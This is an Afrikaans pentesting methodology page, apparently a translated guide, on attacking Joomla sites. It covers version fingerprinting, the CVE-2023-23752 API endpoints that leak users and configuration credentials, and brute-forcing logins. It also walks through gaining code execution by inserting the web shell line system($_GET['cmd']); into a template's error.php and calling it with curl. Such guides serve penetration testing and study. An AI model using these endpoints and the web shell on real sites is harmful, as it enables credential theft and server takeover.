Joomla
Joomla Statistiek
Joomla versamel sekere anonieme gebruikstatistieke soos die uiteensetting van Joomla, PHP en databasisweergawes en bedienersisteme wat op Joomla-installasies gebruik word. Hierdie data kan ondervra word via hul openbare API.
Opsomming
Ontdekking/Voetspoor
Kontroleer die meta
robots.txt
README.txt
Weergawe
In /administrator/manifests/files/joomla.xml kan jy die weergawe sien.
In /language/en-GB/en-GB.xml kan jy die weergawe van Joomla kry.
In plugins/system/cache/cache.xml kan jy 'n benaderende weergawe sien.
In 80,443 - Pentesting Web Metodologie is 'n afdeling oor CMS-skandeerders wat Joomla kan skandeer.
API Ongeagte Geen-gemagtigde Inligting Uitlek:
Weergawes vanaf 4.0.0 tot 4.2.7 is vatbaar vir Ongeagte inligting uitlek (CVE-2023-23752) wat kredite en ander inligting sal dump.
Gebruikers:
http://<host>/api/v1/users?public=true
Konfigurasie-lêer:
http://<host>/api/index.php/v1/config/application?public=true
MSF Module: scanner/http/joomla_api_improper_access_checks
of ruby-skrip: 51334
Brute-Force
Jy kan hierdie skrip gebruik om die aanmelding met geweld te probeer.
RCE
As jy daarin slaag om admin-kredensiale te kry, kan jy RCE binne-in dit kry deur 'n snipper van PHP-kode by te voeg om RCE te verkry. Ons kan dit doen deur 'n sjabloon aan te pas.
Klik op
Templates
aan die onderkant links onderConfiguration
om die sjabloonmenu op te roep.Klik op 'n sjabloonnaam. Laat ons
protostar
kies onder dieTemplate
kolomkop. Dit sal ons na dieTemplates: Customise
bladsy bring.Laastens kan jy op 'n bladsy klik om die bladsybron op te roep. Laat ons die
error.php
bladsy kies. Ons sal 'n PHP een-liner byvoeg om kode-uitvoering te verkry soos volg:system($_GET['cmd']);
Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated